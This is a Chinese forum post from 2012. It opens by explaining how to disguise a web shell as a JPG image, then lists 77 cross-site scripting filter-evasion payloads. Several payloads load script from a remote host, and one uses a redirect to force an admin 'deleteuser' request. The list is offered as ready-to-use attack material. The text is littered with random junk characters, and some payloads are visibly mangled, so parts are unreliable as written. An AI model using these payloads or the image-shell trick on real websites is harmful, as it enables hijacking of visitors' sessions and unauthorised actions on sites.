跨站图片shell
8 F+ Z% J6 r+ S$ g6 A) \XSS跨站代码 <script>alert("")</script>3 q7 C+ j& R: v6 K+ B- `: p1 _$ ?
7 L. ~6 I6 V' R7 l+ k9 |2 V3 v
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马5 u2 v) r" i+ f) n
6 \" l0 s% p# O3 L% p0 a
! T- t+ b1 K0 u; O/ H" G5 W+ h# w1 w5 U1 e6 h' J: J
1)普通的XSS JavaScript注入# d; b+ |2 }* ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" s0 H) O% C1 |
+ x# ?5 ~/ G, _ U. P(2)IMG标签XSS使用JavaScript命令
- A" C N. U/ z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% W5 [3 \4 J X, U# K) c" Y" O8 R/ l5 U/ `
(3)IMG标签无分号无引号
1 O+ ?+ }: a/ g0 ]! c- L+ N g<IMG SRC=javascript:alert(‘XSS’)>% c' ?; c* E. A w3 {
: o- j0 _ h. F$ } R
(4)IMG标签大小写不敏感
) Q% a @$ w6 Y' k<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- |9 F( ~7 `: k) A4 H8 e# Q
X7 A3 `* m& B7 m8 D, ](5)HTML编码(必须有分号)
" ]8 J* O$ Z, {/ e! x2 E<IMG SRC=javascript:alert(“XSS”)>
: w4 _# n! ~- z) K% ~/ O3 @% ]2 y; I1 c5 w- P0 d
(6)修正缺陷IMG标签! o$ k7 r5 ?- g
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
% ?3 R9 F' z" ~" U4 F; {
; J/ C8 C! [! Q+ @2 ^/ t% h(7)formCharCode标签(计算器)
5 p _! R5 L# r9 J+ c8 k. u<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>8 x! W' N# l1 b' O1 f0 R* _1 x
+ P! E+ X2 ]$ B: f, X# E(8)UTF-8的Unicode编码(计算器)
3 m- V8 c7 p7 l' z# T<IMG SRC=jav..省略..S')>
; l0 a9 e( s9 G1 F8 d- \( |: @% R. O3 }. h
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" ^' C5 o( e' ?; s$ y3 b+ L# n<IMG SRC=jav..省略..S')>) u r" G' G3 {+ T7 p3 d
4 }4 s3 E1 @5 o3 s" m
(10)十六进制编码也是没有分号(计算器); M7 k9 V* w) Z* n L
<IMG SRC=java..省略..XSS')>
5 Z0 {7 E3 W ^2 `$ P; W
. t. f3 t, ?. a(11)嵌入式标签,将Javascript分开! v# G8 i/ S8 T# n, N" h- z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% {# e3 f8 _% |% V0 Q% c' _" r2 x& {! g, v, ]$ O
(12)嵌入式编码标签,将Javascript分开
8 u& q/ j# _. u4 C7 m<IMG SRC=”jav ascript:alert(‘XSS’);”>3 w# p8 o: d7 E3 t
/ O0 z% T% r; A& O8 m8 j4 l" J
(13)嵌入式换行符
' ?1 s/ Z' c! O$ ?<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ t, d; L, p$ d. x( P% Q) R" i3 V. ^& G o: ]
(14)嵌入式回车
! R+ t) i, U7 X" ]3 j( S9 h* c<IMG SRC=”jav ascript:alert(‘XSS’);”>2 ?' f% I c/ `3 C( _
: U0 d" c$ P d
(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ U. g$ ~& u+ @% `3 a# N
<IMG SRC=”javascript:alert(‘XSS‘)”>
! h- _% q5 m# V: d" m
; E1 p9 z+ Y5 ^+ E$ d/ }. }% ~(16)解决限制字符(要求同页面)
* Y+ x, E0 r+ a. z2 n2 g5 J' ~<script>z=’document.’</script>
3 }. p) K3 k9 J<script>z=z+’write(“‘</script>
1 V: P: @1 A3 E. Y9 g: `<script>z=z+’<script’</script>
, r: e1 U' N `: }* N8 Y<script>z=z+’ src=ht’</script>1 o1 @5 {9 Q' X4 j2 {
<script>z=z+’tp://ww’</script># K) S* {" B, Q! P' G# d
<script>z=z+’w.shell’</script>
5 C& V! L7 I# ~" i: I<script>z=z+’.net/1.’</script>0 Q/ p5 [- J9 ]2 l4 r
<script>z=z+’js></sc’</script>6 ^% y% v1 c& k# P
<script>z=z+’ript>”)’</script>
9 G! y7 f& C) ?5 R v* V- A; r1 T<script>eval_r(z)</script>
% v0 H4 K4 M4 `# x; j4 N7 v2 a( R# n6 C; E
(17)空字符
" Y7 L ^" m9 N/ W0 N0 F9 xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# C5 s; U2 P# q! P' z9 [, H: O; }. I: F6 V4 Z {
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* d1 g6 X9 Q1 gperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) M' K/ n( r0 ^2 d: s
9 t- `: [" C+ j8 q7 Z$ B
(19)Spaces和meta前的IMG标签
0 d# P5 D0 [( X<IMG SRC=” javascript:alert(‘XSS’);”> _3 `% i0 M X
. j1 A: W3 V1 p! {2 p
(20)Non-alpha-non-digit XSS; H% z, U( H. p
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' }6 {) ]7 Y; V4 P( o6 H1 c
4 d/ R" o+ I, @8 i4 o8 K( M6 u(21)Non-alpha-non-digit XSS to 27 F* h E1 E7 R6 `9 N% R4 _+ ~* n
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ m/ J+ S& j7 r g
6 W X) r) }3 N+ i(22)Non-alpha-non-digit XSS to 3
. q; b0 f" j1 K8 w$ H/ \<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ y" r5 j6 r9 E$ q0 f5 E' ~$ i) D" d4 s
(23)双开括号
7 ~; X1 x( R; I1 ?* v<<SCRIPT>alert(“XSS”);//<</SCRIPT>* i% v* N4 d: j- q
( S5 f; ~6 m9 N" S' i- n, @# x: l(24)无结束脚本标记(仅火狐等浏览器)
`1 N: R# L$ ^, [<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% v, ~+ r7 M; z6 v
8 G3 Y* k5 ?8 M2 [$ c/ D4 g(25)无结束脚本标记2" G; _0 J$ n6 _# o
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 j/ I1 T( s3 g4 G2 F
+ d4 _$ N# d; m(26)半开的HTML/JavaScript XSS7 C' T' m5 l1 W( ?, v
<IMG SRC=”javascript:alert(‘XSS’)”% f5 B0 v3 Z( `' ]2 A" W
' W. ~7 X1 E- u(27)双开角括号6 x8 Z* b2 g3 o4 n, g/ p; N
<iframe src=http://3w.org/XSS.html <
2 u1 ^. X% X, c J A+ {5 V. P& N$ B) ~. ]: O
(28)无单引号 双引号 分号
. o; B$ e2 @ I: |2 Z, ?& T; d<SCRIPT>a=/XSS/7 J- A5 c6 R5 p& ]& W, @& X* L9 Y! R
alert(a.source)</SCRIPT>* I9 _ C( Y( K, q
0 _5 v. [) R7 Z% e, M0 {# F. C; G
(29)换码过滤的JavaScript
% M" f, q8 m8 T2 L/ y7 Y7 y* A" d, ]$ I\”;alert(‘XSS’);//) H8 v# J0 @: N' N
7 B6 g) E8 q) y: D1 s
(30)结束Title标签
& a) ~1 O5 w7 a# L! j! b& E; i; Z</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' s6 h3 f6 U) X5 t' L0 ^% W& `+ W
) l5 n( E, `% U3 e' R' C2 N
(31)Input Image$ ?8 I/ Z7 b2 ]+ j/ R
<INPUT SRC=”javascript:alert(‘XSS’);”>$ I3 @# s! h/ L" ~6 j, |! v' b
8 g* T7 J+ e T4 K
(32)BODY Image
) F# I7 x" U. ~& X7 _<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 R1 F/ c k% _2 C9 V4 ^, B; `' f& z& x% w5 n; y) z0 r% d
(33)BODY标签
2 _: H: c7 J$ M3 u) W) t0 @) l<BODY(‘XSS’)>
, F+ p+ o. U; C2 Z T( T G0 o" s( c# e* f+ Q8 ~0 j
(34)IMG Dynsrc2 r3 k5 o" ?% b1 s. ^
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! ?% ?+ h9 _; h, G. H8 B4 w( F5 l
(35)IMG Lowsrc
/ p. O4 P1 j4 s3 z& K<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ _: G* R1 k5 ~! `5 x9 _( h- c( |+ z- s6 U/ O% X
(36)BGSOUND4 F* p! J1 b! k3 T1 h6 e
<BGSOUND SRC=”javascript:alert(‘XSS’);”>0 ]4 `7 A* b, A7 a; k8 E
* l3 H! [) I2 `# Z! q# |8 q8 W7 x
(37)STYLE sheet1 l8 G* ]6 Z2 e6 K2 E* t0 G
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 Q2 `4 ]' I; D2 Y; t: C6 _
1 u, A6 [- Y$ m! K' ^( M/ b
(38)远程样式表
' u! w9 _3 V% g* |7 b) v: e$ j<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 l$ P3 W( c, h1 I* e; _; _; u8 `. b
(39)List-style-image(列表式)- r+ Y0 |+ R3 ~( V! w
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS+ L- E8 G5 N9 W7 w! @+ Y" o
' `/ F% d8 f7 U, a5 I
(40)IMG VBscript
4 P. j- W( `, `# N* c<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 U6 D( x, \! u1 x$ }9 h, k" _$ J: g: n4 Y
(41)META链接url7 b' ~+ d# Y4 ^! i1 H {1 {3 i3 d
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
8 @8 A! u- F' k; o
" O% C( f/ O i, G+ S: |+ W(42)Iframe
" \ ~" J- U- Y) P: H3 [" x, W. B- u<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
t' W$ t% I- T- D& v$ R(43)Frame7 R" D$ N8 h8 X8 ?
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>. w% w# j' Y+ E& o# Q6 _7 O
6 ?5 o2 M- {9 F K2 n3 ~(44)Table! J6 ~1 j {! r7 C$ R/ L2 S
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& B% A4 \2 {1 B9 e
& e/ ^) v9 Y) h+ {' a! l(45)TD
/ Q8 l% x% G+ t4 M2 D<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 m0 U) d/ ?' C8 Q* y! K7 X! e+ Z/ U4 ~8 v1 k! l
(46)DIV background-image
! k2 L, F6 u% I7 ~# v! F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: e0 d6 T- V9 F$ t6 _) _
P# T2 j* e# u8 x% v& {2 y- c
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). c; ?" A7 |& U3 B* S2 Z
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>( G _) ?/ f4 e. O; x' d; [
s7 G9 i; I0 f1 q- m: A(48)DIV expression
' r+ d' e, u* [- A0 H1 E- y2 ]- s<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
; m+ X: d8 U# y8 j* T$ G; d
5 x; {7 F0 V9 ~9 D(49)STYLE属性分拆表达6 s- B- N$ j& x( n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
" N' z+ W% X9 b& J2 f. [6 {, A* f$ d; ?% Z" r4 b
(50)匿名STYLE(组成:开角号和一个字母开头)# q. \+ A& Y3 F/ Z
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 i+ V% H% @/ J6 I
/ E* J5 D) Y3 j) h$ A( N0 U% P4 t(51)STYLE background-image
( X! ? s! W+ G<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
. v# U% B! T/ r8 {, z$ V) z
1 `; c, b. E% T8 N4 }" j(52)IMG STYLE方式; h+ b9 L7 l' l/ Z0 e- @
exppression(alert(“XSS”))’> |8 F" B1 T6 H% e7 F
/ {: O, ^& X F [/ l
(53)STYLE background" A# l5 E8 E$ s5 L+ h$ a O
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ K! ~3 D9 w# C$ y7 Q) g3 q( p! D( N! \$ D6 z4 o
(54)BASE! u4 p2 u* T! ]
<BASE HREF=”javascript:alert(‘XSS’);//”>
+ ?- N) l+ a" l8 U) N. h! E5 d
; J# c" g0 C: E+ ~# g; \(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! k" ]. t' L3 A5 Y
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 }( j& P1 j) f. D' e
" M: @1 a# F4 X5 r+ C2 q(56)在flash中使用ActionScrpt可以混进你XSS的代码+ z' l$ n- u: F) X7 G2 i5 B6 [5 }
a=”get”;
6 D% s0 C/ |9 j$ M+ sb=”URL(\”";
, ?- `9 D9 i3 G! v, Vc=”javascript:”;
$ k* O( y! G- a+ [d=”alert(‘XSS’);\”)”;2 L1 T! s- ^- u; j! z8 C
eval_r(a+b+c+d);& C' }- V6 U5 c
3 r, [' \9 q$ n* C% j( N1 d2 I
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 \: Z" D; J2 k<HTML xmlns:xss>
! S V6 y- P; z& g* N2 i<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
7 w7 c0 U9 ^; Q% v<xss:xss>XSS</xss:xss>% f d0 v2 N$ ?( w; j! W
</HTML>
0 r) F& A# K! [# P# ~0 d# J' a- ]7 {& H
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用* e' k7 I8 p! n1 Y& O, r
<SCRIPT SRC=””></SCRIPT>$ d' z+ w8 ]! l4 t# W9 `( C: \* Q! I
+ g) `1 u2 O2 I! n
(59)IMG嵌入式命令,可执行任意命令
6 Y. W; [5 b" N* j<IMG SRC=”http://www.XXX.com/a.php?a=b”>+ x$ G% l" A3 X: N, S8 |! P
1 y4 P2 \! e/ H. |+ N4 x, k8 T
(60)IMG嵌入式命令(a.jpg在同服务器)& K( a3 X& L+ f4 s% _
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser6 T/ e: Q, T- G9 G7 w: T" K
( [# }* t6 ?! o, b# I
(61)绕符号过滤% v. ]0 e& E( |
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 N$ {% s0 n# S/ \. i- o2 l$ ?4 S" ]: R' i
(62)
6 k/ V# h5 S) H! W( }9 {% ?<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 I3 r# P# a# [" G- D7 a, e% }( t, @$ ?" v9 e) e; w/ v7 J/ Y
(63)
% v8 ?- U* E, d1 ~<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! d$ _! e' p N
7 Y6 s1 M4 P9 d3 W5 q' ~" D
(64)" }: f, k5 Z/ k9 D; g9 _0 O. p2 C
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
4 V" g( ^) `0 r* z' I6 ], i. B; A6 [3 o7 Y, f! c: r2 s
(65)
5 j, ~8 `) S* E9 Y6 C+ b<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
4 k/ z: f2 F' b! D% b. i7 O6 p8 Y) S. z6 Y6 \; \- h
(66)- b/ x- h) a) D. B, E
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 w( d5 T( x! z& b- H$ g3 H k( j
, {8 U" g6 l" f+ r! Y5 R G
(67)
% F' o: g3 U& a( ~<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>0 d% \3 K5 E6 Y- \ e1 V
! S; N6 }# |! Z4 o8 g. b! E+ V(68)URL绕行# P3 b L' j. b/ p/ z5 @
<A HREF=”http://127.0.0.1/”>XSS</A>: n( D! U6 l* q' l8 e( h- ]
# ?: ~ g+ `& a
(69)URL编码
- p: a1 s1 \, q- l$ ?2 [<A HREF=”http://3w.org”>XSS</A>% E4 A X% G: j6 T" u" s: ^
6 x' A/ l7 c5 ]- s5 f2 e5 d1 E
(70)IP十进制
& Y$ Q+ S' s6 Z( q( P<A HREF=”http://3232235521″>XSS</A>( W( C6 l, \3 Q/ ~, h: r% ^
* k. M U7 X( W1 Q
(71)IP十六进制
+ N1 w0 T$ V+ ~8 ~# Y! S) s<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ }6 D# r) t O3 E: m& W6 l: r- |- f1 ~8 L+ W
(72)IP八进制" U% s( S5 T0 r4 P. Y; N
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
; o5 C" ?; Y4 ^* \9 m- ~
3 V2 D3 _2 C4 y6 t(73)混合编码
( @; c& l# J+ }$ x<A HREF=”h
. S0 q0 L: |, O4 Q9 |+ Q3 t* ltt p://6 6.000146.0×7.147/”">XSS</A>7 ?( l ?# j' {5 A
9 I8 t0 X, j. A. `. u9 Z+ r(74)节省[http:]
" ^* d2 a+ V# R- j<A HREF=”//www.google.com/”>XSS</A>* ~! H/ Z( g! s7 s# X+ ~% x
5 N# |. |/ X4 A% Y0 L3 ?4 ~' u
(75)节省[www]3 g: n9 G" m$ D+ l8 r
<A HREF=”http://google.com/”>XSS</A>
$ i: O* h& X0 f& i# ~
. q, k# V$ H9 E(76)绝对点绝对DNS2 {2 n9 [9 n8 q) ?6 @ B
<A HREF=”http://www.google.com./”>XSS</A>- X4 g6 ~4 \0 K0 u8 {
) b6 Z- N. J! ~' y/ _(77)javascript链接
, c7 w0 L- I* R& V$ O<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
# E, A+ {0 r9 Q" b, w |
发表于 2012-9-13 17:04:56
收藏
支持
反对